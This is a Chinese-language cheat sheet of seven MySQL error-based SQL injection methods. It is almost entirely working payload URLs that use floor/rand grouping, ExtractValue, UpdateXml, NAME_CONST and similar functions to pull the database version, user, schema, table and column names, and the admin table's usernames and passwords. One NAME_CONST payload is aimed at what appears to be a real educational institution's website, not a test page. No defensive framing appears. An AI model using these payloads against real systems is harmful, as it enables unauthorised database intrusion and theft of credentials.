MySQL暴错注入7种方法整理

previous page next page

1、通过floor暴错

  1. /*数据库版本*/
  2. http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. /*简单办法暴库*/
  2. http://www.waitalone.cn/sql.php?id=info()

  1. /*连接用户*/
  2. http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. /*连接数据库*/
  2. http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. /*暴库*/
  2. http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. /*暴表*/
  2. http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. /*暴字段*/
  2. http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. /*暴内容*/
  2. http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

2、ExtractValue(有长度限制,最长32位)

  1. http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e, (select @@version),0x7e))
  2. http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))

3、UpdateXml(有长度限制,最长32位)

  1. http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
  2. http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

4、NAME_CONST(适用于低版本)

  1. http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--

  1. mysql> select * from article where id=1 and 1=(select * from (select NAME_CONST(
  2. version(),1),NAME_CONST(version(),1)) as x);
  1. ERROR 1060 (42S21): Duplicate column name '5.5.20-log'

5、Error based Double Query Injection (http://www.vaibs.in/error-based-double-query-injection/)

  1. /*数据库版本*/
  2. http://www.waitalone.cn/sql.php?id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1
6、基于Mysql数据类型溢出,见文档
7、基于Mysql函数报错,见文档
  1. GeometryCollection()
  2. linestring()
  3. multipoint()
  4. multilinestring()
  5. multipolygon()
  6. polygon()
  7. name_const()

previous page start next page